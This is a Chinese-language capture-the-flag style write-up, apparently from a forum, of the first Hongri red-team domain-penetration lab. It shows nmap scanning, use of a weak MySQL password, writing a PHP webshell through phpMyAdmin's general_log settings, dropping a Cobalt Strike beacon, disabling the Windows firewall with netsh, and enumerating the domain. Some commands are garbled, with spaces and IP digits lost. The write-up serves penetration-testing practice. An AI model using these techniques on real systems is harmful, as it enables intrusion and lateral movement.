内网渗透ATTampCK红队评估实战 [复制链接]

0x00：写在前面

此实战靶场共3台主机，先把拓扑图理清楚。

win7：处于DMZ区域的web服务器，双网卡（桥接：..0.，nat：..52.）

win2K3：内网域成员主机（nat：..52.）winr2：域控主机（nat：..52.）目的就是攻击者通过拿下和外网相通的win7的shell，进而攻击win7所处域，获得域控桌面的flag，也就是敏感文件。

介绍一下：此靶场红日安全团队红队评估实战靶场第一关，难度不大，多种姿势均可获得域控权限，是练习域渗透各种姿势很不错的靶场，搭建方式也非常简单，配置一下win7为双网卡，桥接为模拟外网ip，nat模拟内网域环境。配置完双网卡即可，dhcp方式获取桥接ip。勿管nat网卡的ip，内网域环境已经搭建好了。ip配置完毕后，三台虚机密码均为hongrisec

0x01：拿下DMZ区的win7

DMZ区也就是处于两个防火墙之间的，一个合格的DMZ区是为了提供外部主机访问内网资源服务器的一个缓冲区域，应该有着严格的内外网隔离，本次靶场只是一个模拟，dmz区并没有很合规。

那么入手以后，先进行信息收集，桥接嘛，那么直接扫一下桥接网段的存活主机，方法多多，笔者比较喜欢用nmap-sP。

也可以netdiscover-ien0-r..0.1/24

获取了目标ip以后，就是扫端口：

nmap-sV-vv-p1-65535..0.

访问80得到一个phpstudy探针。

最下面有个测试mysql连通的。

输入root/root回显成功，hh靶场嘛，很多生产环境中弱口令也是很多的。那么初步getshell思路就是通过mysql拿shell。

dirsearch扫一下目录发现存在phpmyadmin和beifen.rar

直接登录phpmyadmin页面

phpmyadmin页面getshell方式有两种：

1：into_outfile写shell

条件：需要secure_file_priv为允许

并不支持，那就尝试另一个方式，写日志getshell。

日志备份获取shell

showglobalvariableslike%genera%;//查询general_log配置

setglobalgeneral_log=on;开启generallog模式

SETglobalgeneral_log_file=C:/phpStudy/WWW/shell.php;//设置日志文件保存路径

SELECT?php

setglobalgeneral_log=off;//关闭general_log模式

shell写入成功，蚁剑连接即可。

成功getshell。

那么拿shell还有另一种方法就是通过扫出来的备份文件beifen.rar，然后得yxcms的后台账号密码，登录后台getshell。yxcms拿shell方法公网上很多，这里不多赘述。主要看如何进行内网漫游。

0x02：内网信息收集

拿到shell以后，有多种选择，shell上进行信息收集，弹到msf上，弹到cs上，弹到empire上，这里选择弹到cs上。

起一个cs服务器然后客户端连接，这里笔者用的是4.0版本。

cs起一个监听，生成一个windowsexe木马文件，通过蚁剑传入目标机，再执行下面这句关闭防火墙，不然目标会弹防火墙警告框。

netshadvfirewallsetallprofilesstateof

shell执行一下exe即可。

执行后成功上线，调整一下心跳，这里为纯内网练习，心跳为0即可。

beacon执行：sleep0

接下来就是信息收集过程。

ipconfig/all

还发现另一个网段ip：..52.；

且当前主机是存在域内的，初步判断域名为god.org；

执行：whoami，hostname

查询系统体系架构：echo%PROCESSOR_ARCHITECTURE%

查询已安装的软件及版本信息：wmicproductgetname,version

查看当前运行进程：wmicprocesslistbrief

当前并无杀软。

关于域相关信息收集

判断当前主机是否在域内。

上篇文章已经提供了相关信息收集姿势，

这里用：nettime/domain

说明当前主机确实存在域内，接下来就是确定域控ip。

查看当前域的所有用户：netuser/domain

获取域内用户的详细信息：wmicuseraccountget/all

这里会回显出用户的SID，对于后续的凭据利用提前做信息收集。

查看域管理员：netgroupdomaincontrollers/domain

再进行ping域控主机即可获得域控IP：..52.

查看所有域成员计算机列表：netgroupdomain